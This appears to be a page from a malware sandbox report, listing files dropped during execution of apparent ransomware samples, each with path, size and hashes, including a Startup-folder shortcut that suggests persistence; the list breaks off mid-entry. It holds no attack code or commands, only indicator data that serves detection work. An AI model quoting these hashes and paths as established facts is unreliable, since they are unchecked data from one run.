C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\UFK2SIQA\microsoft.windows[1].xml

Filesize
97B

MD5
e6a326b4f10349c85d62f25980045e81

SHA1
86caa720645df306f734718c8ce775c5715419ec

SHA256
96d81f6f4ebe54d50e12dd913b71057365f435779771df07cacfa990514c599f

SHA512
904ca10a49e48f2e18ec4a408b8bbe472cbee67f30cc427e8e6887b416ee2fb1b618ecf74890d375b13ff94d3320cfc89e1bf54078c87090f88d7f1a77955f83

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

Filesize
9KB

MD5
163cc142447c4652f704e8738377457c

SHA1
3e13aedb4322d1815587b640ce497bce4e88aae7

SHA256
c8aefd9c3b11d24cd86334ff0884c7e466e24908f8cb112215b7c01efc1591f5

SHA512
eac77625ed86d6821031a59d521e6aef8464844abc5561b256904f826d0f1a4443e4ead7a44c69667a2482686faac7d74af49cc7e89860a38f735a36c5229ae8

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

Filesize
9KB

MD5
8709e97dcd1cdd59080b840503acc6e7

SHA1
817a6b7a598059a584a1055292c000540c7e8004

SHA256
015abd73b5c2c5d4d50a4c89c45edfe843ff872414815f36c1b4f6787ce974f7

SHA512
f48a237d900a199cd1a460956bf875e6f990606f1a2fa4679bf0d4674c66b9ff997a3b2d58f31186fee7f73032da76d3e378030c9457fb3f5816ebaaa42b8798

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

Filesize
10KB

MD5
ea1819bfcca118dbf5395e37f0ed3cb8

SHA1
18ff1185abc4290d57c9b2cb5238b6637dc68936

SHA256
697d5d354033f0caf0486dafaba35b89a581744e5b09764edc658271b6e64bf6

SHA512
ef25e63fe71d09de7e6c60fb3a7b367117974d43ee303106e0edbe66a846860b0cded11c56cfa06065240c63cb9c02d119124c4bd322962400bd52f2ad6ee029

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

Filesize
13KB

MD5
42c3e2694537dc0647f0c343d0840fad

SHA1
bd5de1c499656d2ad28f02162c90f4667b4532c5

SHA256
19ec74d7dca5a4fd071075168877910ddb7019834216efda65e65a29acf727a8

SHA512
5a29a74ea1287ead39d77e43b6e9155c065fde87a26ccdb547718636fcf7389f8c59aff6bdc9201523f1d68fd3d09fdde028f8c84b69326d285f06e5a3e8369e

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

Filesize
10KB

MD5
60ed0e7c2d67fbc58649d640cbe752cf

SHA1
404f7f81ca14e65362c94210d7cf459802622971

SHA256
bad4bf7586c4dcc6204f9e9cbcd3b7f64fff1f73611e8d90bbde2dfb335df28c

SHA512
c55499027b0fbc24178016a40fd710feaa54621afd1a44706e3db23e4342df18cbf0968fedf9984508956c5b8a413b2525c68b2e70f9af4d3452213a0eb8160a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe

Filesize
10.1MB

MD5
e6d10b61b551b826819f52ac1dd1ea14

SHA1
be2cdcba51f080764858ca7d8567710f2a692473

SHA256
50d208224541ab66617323d8d791c06970a828eeb15b214965a5d88f6a093d41

SHA512
0d5d98424bab24ccced9b73d5ed58851d320e0540963a3ccc14da6d6231b2413136fa11458dc2155bb5844af9e28f3a053f8b7f709a806a4070c5ff737fb0ac8

Download Submit
C:\Users\Admin\AppData\Local\Temp\DataIcon.dll

Filesize
65KB

MD5
9c13dee5530e76820224e6e3a34c2788

SHA1
ede5634949a1a590181e3ecd9187ab24fdfb0419

SHA256
c98a91eeeae6d378c9c48707a564cee040d9b1c27e8a3545df990e9309969e38

SHA512
7ef04bf4a3df54ca72ad7eab890a668201d62ac027495dd6c8fa9cc2f4e787654a3be3423832b493328ad0a6b3e6c525da491d44927d00711d0b5c5cf6ad2024

Download Submit
C:\Users\Admin\AppData\Local\Temp\FPC7FE.tmp

Filesize
177B

MD5
20f3d42d299827918ad1883897b819ea

SHA1
0b4ee2dcdfa88ffa4c769f7f2774e5108868609f

SHA256
384bfb968e4aada7815b7d58573e42c5a355eb02d44a6b0c5d550bc66b4657fb

SHA512
6539b1113365fcecb68346db760e808ab971173149736633e70a970b66497f461a1a4d7834063b6c3d5789df5855b806649ea8ae06cd7ccb7366e15ee355043c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Flonwd.exe

Filesize
11.7MB

MD5
6cda76a4e68d80f64c38c5b4db9a6ed7

SHA1
07fabb30feef9dfd88e2ff47849a84cf529159f2

SHA256
db598dd5699ed06433aa47c8a1d1de9c61bac3bfb82d3fc9e60286a8731a2f6a

SHA512
0a2d78e21544b4c88d12d6757ce7a8266be0b62bf8c4b4ac97fb0f0f170a75165d7a9b88d2b6b286717235555aa82db51482f9fd672ef2beb1e630a414db9030

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\Crypto\Cipher\_raw_cbc.cp37-win32.pyd

Filesize
10KB

MD5
88b3fc546fbca422bfc35472ff6cc02c

SHA1
9078c09fbf6e03500bab9e2083db0ef73f10eb9a

SHA256
23b513c7e303bec76738de739fc850ea43c551f609800d7a4c995277a5d4b5ba

SHA512
9a197e5f5e902f4a03f08e91855fd5ae347786f004ba60f1b5c8d613dfebf7d1c765f7eb04ab68d5ea7063880e54e5d7ba65b74e3a363445f83c5f19bd41d30e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\Crypto\Cipher\_raw_cfb.cp37-win32.pyd

Filesize
9KB

MD5
a5cbbaec60b6b40043a0f902627041ac

SHA1
cc87a383ddb35ebbd136bc558057f8fe61c275d9

SHA256
fd622dad723a51a5df47a092e9ac47e75a83322232cdcf8ddaaf41e88c9136de

SHA512
43c1a2a108e737a9c323a72fc2e8dd69e08a712d53a1acdf9287f608483ee4ff8656702a40e199fc9f21797673053f13c67d4172a5d7f387c5f23a3c6b71e441

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\Crypto\Cipher\_raw_ecb.cp37-win32.pyd

Filesize
8KB

MD5
f8ca1c0fe662f38422924cbfa0a97d8c

SHA1
c49ba8daf40e45bbceba4d07eab55290eb436e18

SHA256
9dcd1d062d79c7eb6361d4b17cbae53eadc592bccd4dedba2091e182673d6851

SHA512
545e9d9240521c74c8f3405ae16aa4f975a090ec00ea906f9723efe052b3df184fbde84e08ebc67d3314157a740a9b89ffbb8062f246e8982767eb473e9a44e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\Crypto\Cipher\_raw_ofb.cp37-win32.pyd

Filesize
9KB

MD5
92fa458ab38334f3c7d4e4fb4ade37ce

SHA1
2ce1720f477970cc7ed5c8e1480b7afb33c78d61

SHA256
ed969d1219fcd4576b56688c7d2bd306b58c99d10c0916241e5ff13350d61a3c

SHA512
21ac7552ea5a514ad7e7dd30d38c97d64b9151470efd1c9831eae9129c27063625c53528de404fbcd078336afa4fbc08948e0cbaeb840df0f5edec4ea89d1548

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\Crypto\Math\_modexp.cp37-win32.pyd

Filesize
26KB

MD5
2aa25cb1d7e7e44cc4f02b425ecdbd21

SHA1
949a5d0d9e8db141de43dd964260ede1aa306e57

SHA256
5f3f10b82274174f091c189cbd4705436d087c554977b2ec5f9a52fec45eb42e

SHA512
588338b6ea2fcf6306ab5666d07dd40afc25690c0127d15540d78c2fa3ac75fb6e79612c736b50d050390617ef7dc1d15030de78806c77169e4d5c8c4bf95e97

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\MSVCP140.dll

Filesize
432KB

MD5
54628f77144e17530a8b8882d1789c90

SHA1
6b63d1cb13524b664330574fd7911f1f25dfad16

SHA256
21ecd8652ef68418a68dab73d01c1eb8a8b1fa7f6001f1c688ad78da8f7463d5

SHA512
61e90e751912a84c258e0a5662226e38ddb1a9fc5060cb4b257d3ec7a47569af1a0e402e77b5c8a258554504f40c373a49718c2296cede7cda64bc26dc469730

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\VCRUNTIME140.dll

Filesize
84KB

MD5
ae96651cfbd18991d186a029cbecb30c

SHA1
18df8af1022b5cb188e3ee98ac5b4da24ac9c526

SHA256
1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1

SHA512
42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\_bz2.pyd

Filesize
76KB

MD5
5dedab6e47c950a6cb82680a0d415585

SHA1
17d1781d9e5f0cc1b22ed4a81f67645cbb11ba37

SHA256
c5b60eaf4bdf8cd9f4766f77951200ba80332f76fbe462a65300e495710c99ec

SHA512
90c2bd107c8f97a3420a5b349686dd1be363ffbb14113fcd0e84bd14268bb7000e50c91c5793a999a610ec00d706e73ac81f9e21f998bc539bb20b08ace59dcd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\_ctypes.pyd

Filesize
102KB

MD5
ebbb4515f7f9ac0ab8da31ab6eaaab2d

SHA1
39c790e4b52f814ed7e6510b2f407ceb1f771f06

SHA256
261fd41068e65f544ca1279b0bd46b5b7287e40b16504b1eaa63a9f6719de8e6

SHA512
0b1b1a9ce6fa3db6a36dca1b52b76a766f8f4c42a2cee4a0b33f14ab931958cc070ccc00287f0781c9ef82413f8ff34a670c4ae78ef86a2d925a60fe3c6b8d18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\_lzma.pyd

Filesize
179KB

MD5
4e6aa16a3cd862f73fd112860f7c6c90

SHA1
560d2a7948f3f20850dbb5fad5b827d00ef93c87

SHA256
050435d4b43d3a193682f21720ec98037c32947367a172c908fdaad0351b8dbc

SHA512
8ee8349e22bf5265ed58a76bf62e3399eff64ad51a6e8ef113eb6e5c41bc7e8c440ef27102c5d5038e04b1056b989d20738594bdd3950cf13d4def0f8b404255

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\base_library.zip

Filesize
770KB

MD5
d98d0a2edc15a703c844328e7c99d0e8

SHA1
49cbd72b2e053b1a60983cfcaecb77139d0f226b

SHA256
706eeb06128392cf9240c843674ca7f91304fd2ce2a41051b6db701893a59268

SHA512
7d34267b5a3be8f38a9da0904477becd7bfa9ac55521a251b5fa37056295638ccd1c88d2e002674f51b7634cd5ccc3467830072b8aebe36079e2b9ae2e5bdbe0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\python37.dll

Filesize
3.3MB

MD5
7bc5ea400e1ab182b58d90aea9abc64c

SHA1
ccf483cf6205ce7e3c14827ed22baf142a736d3e

SHA256
386b543a7066ae1ceedb0951ffb5ae0de65be84b5ab71fb2b697d3fa55d6dd35

SHA512
3aa87081c6b226723eec24206f447098a40e2487b74bc7d961d96d31aa48a0e3f9c23a96acfb76b8d5809a3e3023e1b1b0b804d6f43b2bfce4e1b6ae1243238a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\pywintypes37.dll

Filesize
110KB

MD5
ffd5fac26740c3975af8112827d724c3

SHA1
58bddb3ecd15a04c2b402a7091d9d57325b073f7

SHA256
0315ee7826f735a72d2208b46f5cebb270e5f1fe3104a4b007aca5c813eef2a3

SHA512
2105388344c8d7b7b48130584186e585e718fe55fea627c4cd70eaf46d4e8acf4431f55bf6619f8708589d4d0ba7ecb1b1848ab763c553badaf33214c12ba73c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\ucrtbase.dll

Filesize
893KB

MD5
a924b24d71829da17e8908e05a5321e4

SHA1
fa5c69798b997c34c87a8b32130f664cdef8c124

SHA256
f32a61d91264aff96efd719915bed80785a8db4c8d881d6da28909b620fe466f

SHA512
9223ec0e6e0f70b92473e897e4fd4635a19e9ca3aff2fe7c5c065764b58e86460442991787525ed53e425ecd36f2881a6df34c35d2a0e21b7ac4bc61bf1cbeab

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\win32api.pyd

Filesize
101KB

MD5
86e4fe10195511f403a8c2de45bb8062

SHA1
79cd2cc3d5165078145106a284c11b4b85ccb037

SHA256
4c28231d0105af47e3d7c7241b5ec50fcbfb3e8b60d68a0dbe8180bd543b3856

SHA512
65a7949ec63d1e1d34093753f05341e51911b74c5c7d4554cf2ee8626333e6460af0b3a4f5780b7cb3c5e7ede1410f907f947542383d7660e0af6afab606928c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\win32event.pyd

Filesize
21KB

MD5
81c01660fcc6c9a4f26d24d817e5c82d

SHA1
84a00bac7de36da1156d4a2c1a24dc73630eb259

SHA256
fa88dd6a564c45605597425f5cd1379e28d2300d3d3d24aa72d823b37b1ec2a9

SHA512
d457141d2009ef0372ff63c010c0586508f581cc24ea2bb6522e53ac37d49b3f51ce28c4173fea1788fe0c33b45d796f52b9d7f975eeb62f91b765f20b130402

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\win32file.pyd

Filesize
121KB

MD5
5efdfb80e9022e95742aba4cfdc52653

SHA1
e6e27d80b107dda132024fcd471ace21871c6126

SHA256
2f2564199890176fad6cd5813f27bc83f0c9b22c44d2c81a7ff804262e2aa0bc

SHA512
c0dddb021c7efff88daf59d6e171b0508648b8d5c69eb02bab2dcc6e4561feb73a336a6557a967ef34a951007a569d80a2c25cda02887d81636f21cd38f3cfc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\wx\_core.cp37-win32.pyd

Filesize
5.4MB

MD5
b4687275dd91489643e60d7941df5c72

SHA1
701d9fe7c9f6a6c9152be46c63e580b20ef8fe18

SHA256
950efad1855ba064e437cddc45f5f796cf81f763db71994222b88a9b1af8319d

SHA512
6cf79b9801bae6188e3f1c7c59741fcc6bd54a6c26e6b7c3704ac761811c523e92e4eb890e4e6ad999067da80b48a6a513df127e5185cd3bb62997b1b28dbda7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\wx\siplib.cp37-win32.pyd

Filesize
89KB

MD5
1f647440c41e8b703af4ec392204dc5d

SHA1
7fd29ea233144ff44871bd4844a9762807f7405d

SHA256
6401fd5e9942c96168ab1325abf4083328101df50d297ab3c47011ac0ce732b9

SHA512
8923b875c8dd05bce1d83aba0c0f1f3b722b642cbf26727ae4cda59153a2e32f6b4c8be4851d25f0fc241f6e80392b8f74d6a784a26a791fa8d10efdf4ce6383

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\wxbase30u_net_vc140.dll

Filesize
157KB

MD5
a914f4291959d8086cdb40c55427e63f

SHA1
5dbd02ed6fd6532ab55b8be5d2812758abed8721

SHA256
26f92eebe76c29e2a85761d5f952f7782a8f2c96db322ad99bb6b8abf1752e07

SHA512
9c37b652a96a26e4ba56386df949126a6def15d6d69a74b10bbda6b240f0d6bf77e72425f0cc413303015578133076d2621830d8e23fcc0f68482b732f9686b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\wxbase30u_vc140.dll

Filesize
2.0MB

MD5
61f8bb19072351c5754c208742669c16

SHA1
b7882966f6ca7f177f0fb64f535c51144be30fe5

SHA256
2c0a84ad2b12d0b49f270c77dc99b73acc1f7bc1e49c6f194e5f3f6db337d62c

SHA512
eed7a26f1041affb2c9e8c8580642c2687dbe01960a58f058c07693acd2db23683d7c5fa0a130e3ea94459d675701207e6adb532a5d061c338c87f24e6514839

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16162\wxmsw30u_core_vc140.dll

Filesize
4.8MB

MD5
5aed143ddd0208a4ec46834553810610

SHA1
a8a2df91b0177eb33b77469edaf06662409a565a

SHA256
5cf6dd97dba4aba69a7cbf94f4987962f8fb248f78fc48408bb2989d45061f9c

SHA512
21cb63969800d106f72c5cdb929361dc284b32637c60a7f302be1f847c272148a88c99a94ced4c8d15c52504526fda801fa1154ee82bc9abd16494b06089286d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nzp31uuj.ufi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aut868D.tmp

Filesize
774B

MD5
eeaa1c9680e07701008a15f89236d1d3

SHA1
9b8e2c5f9bfaa032cb928ab1d0f1b0b174585814

SHA256
65dd8012c321d329ea8b7dcf835b807b5b5eae261f8cc66ef277162997d4a94b

SHA512
ecdbd09c21aadfc960416dd968f6e120f227cc58ad0352e495d41be1537063c9c2c7f1ee2d741e07a4c7dd33f2251aef0864858cffe139f8bf886f305f2d362f

Download Submit
C:\Users\Admin\AppData\Local\Temp\autC25C.tmp

Filesize
40B

MD5
7c99f0145a08e17c5584326234478c5d

SHA1
f0aa666abe4c1544f97871bff3cc082e3dcc141a

SHA256
9b0487d4afa6c1456be835f7d30f90b752bb0a72490222e1f828f0d449de9a90

SHA512
1f630212b52b75c15fe8e10302faa36d9f7e40641123ca10123f2df4447b709efcae090d380ec54ec6aa81f365991466553a93b702dd3a8591e7a37b0cf7edf0

Download Submit
C:\Users\Admin\AppData\Local\Temp\download\DataM.exe

Filesize
319KB

MD5
8e62bfea931f7aec30d574d1a7a2e270

SHA1
535d67718f6f1c2942018db182c0cca187d98bb1

SHA256
c22af68b999246c8d03827dc9826411a5edae1a57ccbcb6cf0294e713d1ba44b

SHA512
b9407fa999db7c577cb65fc4612efdd0143ce07311c1acd792768393013901f3fda3fa4bdb2c3cfc57c97f6af3a6b5309a3624d3433a76105418c5b5d916c1ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\dsptw.exe

Filesize
23KB

MD5
c3429879521305de064a0952dab5eb6a

SHA1
167e21603daacb16801e0e3cc1693d2da4d65cc4

SHA256
9f8439a9217a1f1e2aa46e611a8e38b591500f986c484ec179cfef712cbff707

SHA512
be10440e7a805c5f28e861a0e71633d7bc3f68947218ba707f3a7d43dcb2896a550f686944fe4cfc2328e9d0bfe63c0c81da2bfd64b45c576e12d7a13480e266

Download Submit
C:\Users\Admin\AppData\Local\Temp\lite_installer.log

Filesize
14KB

MD5
ceff2887cf5f1bee1c636d09a0d9a995

SHA1
4c3d1c8fb8bce516eba2af00c466ed204cada285

SHA256
0ef2d1c978fa4d16f84720f45c5dd4aef9ca6daf02f80a95a0bdb3b68d90b57f

SHA512
c75648a012b636b0d1d2294dd1c5c04175070daefcfff0e62729986e54cdb53bffbe4f557b6ba36b5d3d27502e80744d92418ab1ceb2637637cdac95a5db26a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\nszDBB6.tmp\INetC.dll

Filesize
24KB

MD5
640bff73a5f8e37b202d911e4749b2e9

SHA1
9588dd7561ab7de3bca392b084bec91f3521c879

SHA256
c1e568e25ec111184deb1b87cfda4bfec529b1abeab39b66539d998012f33502

SHA512
39c6c358e2b480c8cbebcc1da683924c8092fb2947f2da4a8df1b0dc1fdda61003d91d12232a436ec88ff4e0995b7f6ee8c6efbdca935eaa984001f7a72fea0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\omnija-20243303.zip

Filesize
22.9MB

MD5
af639c98f0b4da24ecdda0923bc00df5

SHA1
85123318dbd7971b98a5e51170ea9385e5399f11

SHA256
db873ac03ca5a00c834be24cc3b522bad9061cde43476b8e5358c56f7ca4b487

SHA512
901382cb201e9fc39762c97dce3252cae5e4c2be2bc4b168736e7e27515fb4ba169df368f0e00cd55175bcdef5332acf3a84682f2dc2f2925422008dee247bb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\vendor00000.xml

Filesize
510B

MD5
27bdb0864e3f7a9f6c61810adeaa9f53

SHA1
3c911d197a054a51a1ad444e3bcc4b634063597a

SHA256
5981cca348493c670d47550ec9b201662046f5bb7c298af860c28814ff2f112f

SHA512
0a4d78904c5efc0a2529b8d6f3e8e7001dd59807de8e9bd195e2f8a561b2e15de827dd65a74f7010f534f24df5fa2adb3e56074848878119955890feacde24ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\{BA0987E1-9570-4E94-AE41-C11074E7063A}.exe

Filesize
8.7MB

MD5
6e358158ab5be3e47deff097020a2a42

SHA1
32cf029a0e15ddb01b0513fda4158addecadf9c9

SHA256
8b979e74878e9f8c8b4cbb6bdbd0faf8321718a2ed32040daf28ac2bed365f7a

SHA512
bc5abed9bf03274d9dad6c242cc9870bb5fdccc61f205ba18ee2d5c82f36c1ce7632aa2a94723bc65fc057ff383fcf01312f3d50bf7198c622b5e4aba9f7eebe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk

Filesize
1KB

MD5
42b0f53002b1f1b8e7a6f0c927fda2f1

SHA1
7829786a47b49a88552aac8e5235523d4aba0d98

SHA256
90a83750fdb5f11357fef695da7918f192f91b92f5909adae8b3fffa81397e10

SHA512
83f35d26b732904464064ab9fcb782c8ff67317c05437c46232bd2c467baf83f599c0bd028c0a4d800832644d006418423062b463f82eaa4a8798670d5679cc9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

Filesize
51KB

MD5
bd74a3c50fd08981e89d96859e176d68

SHA1
0a98b96aefe60b96722d587b7c3aabcd15927618

SHA256
ab305218ee0e95fa553885fa52f3a25dcc13b4deade8b7993ccb9f230a272837

SHA512
0704243904abc3691177e34606fe2741945f69cf7ecb898655d98e81b145bf707d20cfa0af01fb3aa1cd170e2f3ce8f625b1612e0fcf5eba01f770617ffc9f1e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\places.sqlite-20241103223350.160567.backup

Filesize
68KB

MD5
314cb7ffb31e3cc676847e03108378ba

SHA1
3667d2ade77624e79d9efa08a2f1d33104ac6343

SHA256
b6d278384a3684409a2a86f03e4f52869818ce7dd8b5779876960353f7d35dc1

SHA512
dc795fa35ea214843a781ee2b2ef551b91b6841a799bef2c6fb1907d90f6c114071a951ebb7b2b30e81d52b594d447a26ab12ddb57c331e854577d11e5febef5

Download Submit
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks

Filesize
2KB

MD5
1c5fef55eb6e80ee6b84b3ea1ed815a8

SHA1
69521538586d7db36c52b0f0cae192d383617a84

SHA256
ac0730112faba095883d18909a05e716eb5f7680c3603dd209414a5cad1ee0f1

SHA512
030600069c9834201f2ae8063a0087c4dc9730df48350e9524ec32ea14e52c700b01df0075206dcf29e00f90cd152f26967b05223bf724580337cb5dfacee50e

Download Submit
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks-20241103223354.190478.backup

Filesize
1KB

MD5
3adec702d4472e3252ca8b58af62247c

SHA1
35d1d2f90b80dca80ad398f411c93fe8aef07435

SHA256
2b167248e8136c4d45c2c46e2bff6fb5e5137dd4dfdccde998599be2df2e9335

SHA512
7562e093d16ee6305c1bb143a3f5d60dafe8b5de74952709abc68a0c353b65416bf78b1fa1a6720331615898848c1464a7758c5dfe78f8098f77fbfa924784c0

Download Submit
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\BookmarksExtras

Filesize
18KB

MD5
a9bb1ceef45cd6c0b360d5ef64af9f44

SHA1
33823fb7e1ad42cbe8223cf421241fd9580cec99

SHA256
e14e7c70402035144f441340f8ce04f06dabb3e2a87356553f4524949928ab1b

SHA512
239e68eb663cd778426747fa285a381315211ac14d564a6e6ddd153014d4a26b0469c11d22cb8f205a561243586d6700ea5a55f80ded50e94539f622913a024c

Download Submit
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences

Filesize
318B

MD5
fe2228417f609a6ddc8990d96bcadd14

SHA1
6bafa7f9a9d1da0ec838fcf8c9625fc045904561

SHA256
94fe91aa91c4ea645f819cb330c3118853d6a40f9b55175f4de8583199c51813

SHA512
19cbdbd6290d4688ca474d3f117dfd9336c2d0d8477c6409207698e10e4e2251e989668735c7a5fe51a5ffb9968602612068113fc9b80232dd09d7f011e17937

Download Submit
C:\Users\Admin\AppData\Roaming\WININST~\bt-okbak-1.7TMP

Filesize
17KB

MD5
31f35def719bef44a79ca0ba58ae03cf

SHA1
2e4ec7e469245c0a60cd5ba934108988757e9a30

SHA256
4342c69d7c67f69446e058c0c5a927369d033924013e12fe1de69e7ade4b1251

SHA512
65791ebb15232051b7a8bd7cef23bbe602711c681146866e1ae5d48257a0325a51598e8acdb79797524e5550a2bbfbf54075ab1e6ed50e8b4012956b1a1040fa

Download Submit
C:\Users\Admin\AppData\Roaming\WININST~\bt-okbak-2.7TMP

Filesize
18KB

MD5
7a188eaf2316be36da520d75766a0ec3

SHA1
aeb31e484effb54cbe1c3307bfaa3c4d7d1e478f

SHA256
305f0869a887e554feb2e24c3e707338af0be00ea2235f1d409712cab2639f3f

SHA512
5ffe43c9e80b4eaa66e61390cbaa50761830f4171925056aa0af7f80efac1faf13c7e0fab1a9434354bcc904bb21fb3241f36fe308e26e3f63abaff161473861

Download Submit
C:\Users\Admin\AppData\Roaming\WININST~\bt-okres-1.7TMP

Filesize
17KB

MD5
e0df5ac7225fa699d31e1db26e4d97a5

SHA1
477595559c8635fbfdaee9de6a74267de9771654

SHA256
ae000950b0d98c4d88efee65c9aa29e3f3e99584ecc74af7b208f5df7770c0cc

SHA512
5ad0a87b4d13b6ea1f24531752c251d0606bfa87765c7949ab9014a142a3a40ad4a88f4835462f3e3f25af422c29a0a00bc29082cf2141159e617fcb97d77185

Download Submit
C:\Users\Admin\AppData\Roaming\WININST~\bt-okres-2.7TMP

Filesize
17KB

MD5
4c48b6e3839179f6a545d7e32cbbb95e

SHA1
de22fc5514bf7847c9ef1d83c663433d58711052

SHA256
889f309d1d36ca0e6251c95108e9ff5e97ef1af6b3d1044abac367a3464dc30c

SHA512
9ca972000b5d30c8e6f5037eeee81f977cecf01d52e8fb3c7e8c9abf802fb979e2267cfadb6385f36b18456182f8c46b188d943cc931a12a14888076de501f55

Download Submit
C:\Users\Admin\AppData\Roaming\WININST~\bt-on-1.7TMP

Filesize
16KB

MD5
ad4584d015d7e69c70b0a4868e8fb8fb

SHA1
0e8fbbc603e1a1783b1f33a0b841763e30a2e377

SHA256
6db781c49b670f61327bd91e2eadac691286450ace40fff9b70a4518ad445013

SHA512
0b45654a719157b67bdab0ec16132633c4ce6ae2d16a8974c2586d940904d74001810865d6bc1b61a7d3f68ee7863eadebb8a400c05336ed08eaac6b80b31e82

Download Submit
C:\Users\Admin\AppData\Roaming\WININST~\bt-on-2.7TMP

Filesize
16KB

MD5
8bcb52f23189530ffccf5e2ec10671b4

SHA1
b93e347c9eb88f8d9c8d40478bbf3c8f9cb472f5

SHA256
9703393cbb9e1bf0b8de8c1c8244946874ac90b6d9b4acb1c2a8bf948f29202d

SHA512
e1cef85e85625de579425455d0baf7a88232a042c2fe03c940a606330913321b198a568ef1a446a8dc232c328b8d0a41f530f3d684db473a835bcd313d9c67ac

Download Submit
C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.MSIL.Blocker.gen-6112208ce621f62dc23cbe23ee9dc9fb1b19afeb04100ece403ad77e7808d2e8.exe

Filesize
256KB

MD5
58ad8eeeba31b372d26805182c5ab921

SHA1
a1b3dadb8510cc84ef50a47e9e00475e8286a2b9

SHA256
6112208ce621f62dc23cbe23ee9dc9fb1b19afeb04100ece403ad77e7808d2e8

SHA512
2afd0d641d12e39011ba8f99c5c96602ca05c576be5c85bae1a7dc0cabb88ec7a89827492d376e64c8aca32d5424552fd1fd19fc008248fab3525b792ed95063

Download Submit
C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.MSIL.Encoder.gen-325953506271955c3daa23c2de161f5a4128df3655609f48c77cc01cff405c9f.exe

Filesize
11.7MB

MD5
fd755cae81d2b6d9b60c0eb0e5e42a56

SHA1
35bf843f21633dda3345f3ed0a2ab504b365c622

SHA256
325953506271955c3daa23c2de161f5a4128df3655609f48c77cc01cff405c9f

SHA512
41f877e7ce6e8979364748eeb5ee2d24e4a48fe0c7757180457d24067958d25896ac1ca464990f4133d681a32d82662e214ccd341b51e094a3b6625491f6bf7d

Download Submit
C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.Win32.Blocker.vho-443f2930646f2cb7118c8a9146a7bfb3ad16ed5c234bda832d479cbccb591aad.exe

Filesize
18.9MB

MD5
614e82815f09ee0666f41f2a710d42bd

SHA1
d585bf61ccba9a95dec9fbac7c268bc9d2b3fbdc

SHA256
443f2930646f2cb7118c8a9146a7bfb3ad16ed5c234bda832d479cbccb591aad

SHA512
7fb5c7c025307387e9c62debf86e817eb116f8126c9480582629aa80a26c1be579306617484ad1b75097387c7b6299377744b9a26040f8319f62a4bac83e59ca

Download Submit
C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.Win32.Convagent.gen-493256859f821fdc95d26718e83555978d52873f520d0421d0c8e7748ae23c44.exe

Filesize
448KB

MD5
b67473e0d50a181c5003f73d5b657a32

SHA1
